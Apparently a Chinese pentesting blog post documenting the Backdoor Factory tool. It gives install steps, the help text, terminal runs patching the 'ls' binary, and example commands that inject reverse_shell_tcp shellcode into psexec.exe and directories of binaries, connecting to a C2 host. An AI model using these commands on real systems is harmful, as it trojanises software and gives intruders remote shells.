j4s0nh4ck
- 浏览: 292941 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
参考:https://github.com/secretsquirrel/the-backdoor-factory
貌似很有趣,值得深入了解了解
安装过程
支持格式:
使用
例子:
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
Checking file support
System Type Supported: System V
Gathering file info
Getting shellcode length
The following LinuxIntelELF32s are available:
reverse_shell_tcp
reverse_tcp_stager
user_supplied_shellcode
[!] Could not set shell
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -s reverse_shell_tcp -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
Checking file support
System Type Supported: System V
Gathering file info
Getting shellcode length
Must provide port
Setting selected shellcode
Must provide port
Patching x86 Binary
[!] Patching Complete
File ls is in the 'backdoored' directory
貌似很有趣,值得深入了解了解
安装过程
1. easy_install wget "https://pypi.python.org/packages/source/e/ez_setup/ez_setup-0.9.tar.gz#md5=1ac53445a67bf68eb2676a72cc3f87f8" -O easy.tar.gz tar vxf easy.tar.gz cd ez_setup-0.9/ python ez_setup.py 2. 安装pip wget 'https://pypi.python.org/packages/source/p/pip/pip-1.5.6.tar.gz#md5=01026f87978932060cc86c1dc527903e' -O pip.tar.gz tar vxf pip.tar.gz python setup.py install 3. 安装the-backdoor-factory wget https://github.com/secretsquirrel/the-backdoor-factory/archive/master.zip unzip master.zip cd the-backdoor-factory-master/ ./install.sh
支持格式:
引用
Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32),
and Mach-O x86/x64 and those formats in FAT files
Packed Files: PE UPX x86/x64
Experimental: OpenBSD x32
and Mach-O x86/x64 and those formats in FAT files
Packed Files: PE UPX x86/x64
Experimental: OpenBSD x32
使用
root@kali:~/the-backdoor-factory-master# ./backdoor.py -h
Usage: backdoor.py [options]
Options:
-h, --help show this help message and exit
-f FILE, --file=FILE File to backdoor
-s SHELL, --shell=SHELL
Payloads that are available for use. Use 'show' to see
payloads.
-H HOST, --hostip=HOST
IP of the C2 for reverse connections.
-P PORT, --port=PORT The port to either connect back to for reverse shells
or to listen on for bind shells
-J, --cave_jumping Select this options if you want to use code cave
jumping to further hide your shellcode in the binary.
-a, --add_new_section
Mandating that a new section be added to the exe
(better success) but less av avoidance
-U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
User supplied shellcode, make sure that it matches the
architecture that you are targeting.
-c, --cave The cave flag will find code caves that can be used
for stashing shellcode. This will print to all the
code caves of a specific size.The -l flag can be use
with this setting.
-l SHELL_LEN, --shell_length=SHELL_LEN
For use with -c to help find code caves of different
sizes
-o OUTPUT, --output-file=OUTPUT
The backdoor output file
-n NSECTION, --section=NSECTION
New section name must be less than seven characters
-d DIR, --directory=DIR
This is the location of the files that you want to
backdoor. You can make a directory of file backdooring
faster by forcing the attaching of a codecave to the
exe by using the -a setting.
-w, --change_access This flag changes the section that houses the codecave
to RWE. Sometimes this is necessary. Enabled by
default. If disabled, the backdoor may fail.
-i, --injector This command turns the backdoor factory in a hunt and
shellcode inject type of mechinism. Edit the target
settings in the injector module.
-u SUFFIX, --suffix=SUFFIX
For use with injector, places a suffix on the original
file for easy recovery
-D, --delete_original
For use with injector module. This command deletes
the original file. Not for use in production systems.
*Author not responsible for stupid uses.*
-O DISK_OFFSET, --disk_offset=DISK_OFFSET
Starting point on disk offset, in bytes. Some authors
want to obfuscate their on disk offset to avoid
reverse engineering, if you find one of those files
use this flag, after you find the offset.
-S, --support_check To determine if the file is supported by BDF prior to
backdooring the file. For use by itself or with
verbose. This check happens automatically if the
backdooring is attempted.
-M, --cave-miner Future use, to help determine smallest shellcode
possible in a PE file
-q, --no_banner Kills the banner.
-v, --verbose For debug information output.
-T IMAGE_TYPE, --image-type=IMAGE_TYPE
ALL, x86, or x64 type binaries only. Default=ALL
-Z, --zero_cert Allows for the overwriting of the pointer to the PE
certificate table effectively removing the certificate
from the binary for all intents and purposes.
-R, --runas_admin Checks the PE binaries for 'requestedExecutionLevel
level="highestAvailable"'. If this string is included
in the binary, it must run as system/admin. Doing this
slows patching speed significantly.
-L, --patch_dll Use this setting if you DON'T want to patch DLLs.
Patches by default.
-F FAT_PRIORITY, --FAT_PRIORITY=FAT_PRIORITY
For MACH-O format. If fat file, focus on which arch to
patch. Default is x64. To force x86 use -F x86, to
force both archs use -F ALL.
例子:
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a
./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
msfpayload windows/exec CMD='calc.exe' R > calc.bin ./backdoor.py -f ls -s user_supplied_shellcode -U calc.bin root@kali:~/the-backdoor-factory-master# ./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow
引用
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
reverse_shell_tcp
reverse_tcp_stager
user_supplied_shellcode
[!] Could not set shell
引用
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -s reverse_shell_tcp -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
File ls is in the 'backdoored' directory
分享到:
发表评论
-
[图] windows 10
2015-08-18 20:37 322网上下载的图片,忘了来源 -
[转]Tunneling Data and Commands Over DNS to Bypass Firewalls
2015-07-13 20:44 492https://zeltser.com/c2-dns-tunn ... -
windows提权集合
2015-06-30 00:23 614https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 540原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1730原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 490引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 797原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 423原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 508原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2897原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 334原文地址:http://blog.gdssecurity.co ... -
自动化Man-in-the-Middle SSHv2攻击
2015-03-18 01:26 1052参考:http://www.david-guembel.de/ ... -
window增加硬盘性能方法
2015-02-05 01:03 364参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 820原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 1016https://blog.netspi.com/15-ways ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 955原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1567下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1038原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3844原文地址:https://cyberarms.wordpres ... -
vmss2core将VMware镜像转换成memory dump
2014-12-26 23:59 0参考:http://kb.vmware.com/selfser ...
相关推荐
2. 进入 The Backdoor Factory 项目的目录,使用命令 `cd the-backdoor-factory`。 3. 使用 `./backdoor.py` 命令来生成Payload,并将其植入到可执行文件中。 4. 使用 `-f` 选项指定要植入的可执行文件,使用 `-S` ...
simple-py-backdoor-master.rar
是一款从CAD运行界面中抓图的绝佳软件,可以设置线宽、颜色、背景色等。
《Backdoor Factory:深入理解与安全应用》 Backdoor Factory,这个名字听起来可能让一些人感到不安,但实际上,它是一款专为安全测试而设计的工具。这个工具的主要功能是生成win32PE后门测试程序和ELF(Executable...
内含MITMf.zip BDFProxy.zip LANs.py the-backdoor-factory.zip DHCPShock-master.zip Available plugins ================= - ```SMBtrap``` - Exploits the 'SMB Trap' vulnerability on connected clients - ```...
在Simple-Backdoor-main文件中,我们可以看到实现这些功能的具体Python代码。通过阅读和理解代码,我们可以学习如何使用Python进行基本的网络编程,以及如何处理命令行输入和输出。 请注意,创建和使用此类后门必须...
标题 "PHPStudy-BackDoor-EXP PHPstudy后门利用脚本" 涉及到的是一个针对PHPStudy软件的安全问题,即PHPStudy后门利用。PHPStudy是一款集成环境的工具,广泛用于PHP开发者的本地开发环境搭建。然而,如同任何其他...
标题 "PHPStudy-BackDoor-EXP PHPstudy后门利用脚本.zip" 提示我们关注的是一个与PHPStudy相关的安全问题,具体来说是一个后门利用脚本。PHPStudy是一款广泛使用的PHP开发环境集成软件,它包括PHP、Apache、MySQL等...
【PHPStudy-BackDoor-EXP PHPstudy后门利用脚本 .zip】是一个关于网络安全和PHP开发的专题,其中涉及到PHPStudy这个流行的PHP开发环境以及它可能存在的安全问题。PHPStudy是一个集成了Apache、Nginx、PHP、MySQL等...
在`grpc-http-backdoor-master`这个压缩包中,我们可以预期包含以下内容: 1. `protos`目录:存放protobuf定义的服务接口和消息类型。 2. `server`目录:包含gRPC服务器的实现,可能有一个HTTP处理器来转发HTTP请求...
"ember-backdoor"这个项目似乎是专门为Ember应用设计的一个安全漏洞或者恶意功能,通常在安全领域,"后门"指的是开发者有意或无意留下的、允许不受限制访问或控制系统的通道。在 Ember 应用程序中,一个后门可能被...
国外安全研究员在2014年8月发出的一篇关于Absolute公司的防盗追踪软件存在安全风险的技术分析文章。
PHPStudy_BackDoor_EXP PHPstudy后门利用脚本
后门工厂从零开始重写The Backdoor Factory-一种MitM工具,用于将shellcode插入到网络上所有类型的二进制文件中。介绍backdoorfactory是对的扩展,它允许将Shellcode插入拦截的文件下载中。它允许您中间人下载Web...
### ESET关于Turla间谍组织第二阶段后门Carbon的研究报告分析 #### 报告概览 ESET公司在2017年发布的一份重要报告聚焦于Turla间谍组织使用的第二阶段后门——Carbon。这份报告深入探讨了Carbon后门的最新版本,并...
php面试题
php面试题
**Gel4y-Mini-Shell-Backdoor详解** Gel4y-Mini-Shell-Backdoor是一款针对Web服务器的安全漏洞利用工具,主要用于绕过服务器的403 Forbidden和406 Not Acceptable错误,从而实现非法访问和控制。这款后门程序小巧且...
title={Input-Aware Dynamic Backdoor Attack}, author={Nguyen, Anh and Tran, Anh}, booktitle={Proceedings of Advances in Neural Information Processing Systems}, year={2020} } 要求 安装所需的python...